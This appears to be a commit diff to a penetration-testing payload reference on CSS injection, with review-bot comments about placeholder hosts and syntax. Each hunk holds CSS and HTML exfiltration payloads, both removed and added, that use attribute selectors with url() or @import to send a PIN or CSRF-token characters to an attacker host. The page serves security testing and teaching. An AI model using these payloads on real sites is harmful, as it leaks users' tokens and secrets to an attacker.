Normalize commands, callbacks and references

Swissky
2026-04-22 15:03:31 +02:00
parent a79b1f5692
commit d4e6eda4ad
17 changed files with 114 additions and 114 deletions

@@ -47,7 +47,7 @@ input[value^="TOKEN_012"] {
```css
input[name="pin"][value="1234"] {
background: url(https://attacker.com/log?pin=1234);
background: url(https://[ATTACKER.DOMAIN.TLD]/log?pin=1234);
}
```
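Review bot: The placeholder in the new `background: url(https://[ATTACKER.DOMAIN.TLD]/log?pin=1234);` line is not explained anywhere in this hunk, and a bracketed host is parsed by URL parsers as an IPv6 literal, so the snippet is no longer a well-formed URL as written. Please state once, near the top of the file, that `[ATTACKER.DOMAIN.TLD]` stands for a host the tester controls and must be substituted before use, so readers do not take the brackets as part of the syntax.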
@@ -57,7 +57,7 @@ input[name="pin"][value="1234"] {
```css
input[name="csrf-token"][value^="a"] + input {
background: url(https://example.com?q=a)
background: url(https://[ATTACKER.DOMAIN.TLD]/?q=a)
}
```
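Review bot: The replacement line does more than swap the host: `https://example.com?q=a` becomes `https://[ATTACKER.DOMAIN.TLD]/?q=a`, adding a `/` before the query string, which the commit title does not mention. If the path normalization is intended, say so in the commit message. While the line is being touched, the declaration still has no terminating `;`, unlike the `pin` example in the previous hunk; adding it would make the two CSS snippets consistent.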
@@ -76,8 +76,8 @@ div:has(input[value="1337"]) {
This technique is known as **Blind CSS Exfiltration**. It relies on importing external stylesheets to trigger callbacks.
```html
<style>@import url(http://attacker.com/staging?len=32);</style>
<style>@import'//YOUR-PAYLOAD.oastify.com'</style>
<style>@import url(http://[ATTACKER.DOMAIN.TLD]/staging?len=32);</style>
<style>@import'//[ATTACKER.DOMAIN.TLD]'</style>
```
Frames do not always need to be reloaded to reevaluate CSS. The `@import` rule allows for latency; the browser will process the import and apply the new styles.
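Review bot: After this change the two `@import` lines point at the same placeholder and differ only in syntax (`@import url(http://...);` versus the quoted, protocol-relative `@import'//...'` with no `;`), so it is no longer clear from the snippet why both are listed. The removed `YOUR-PAYLOAD.oastify.com` host at least hinted that the second line was a separate callback variant. Consider a short sentence above the block saying what distinguishes the two forms. The first line also keeps `http://` while the CSS examples in the earlier hunks use `https://`; a normalization commit is a good place to settle on one scheme.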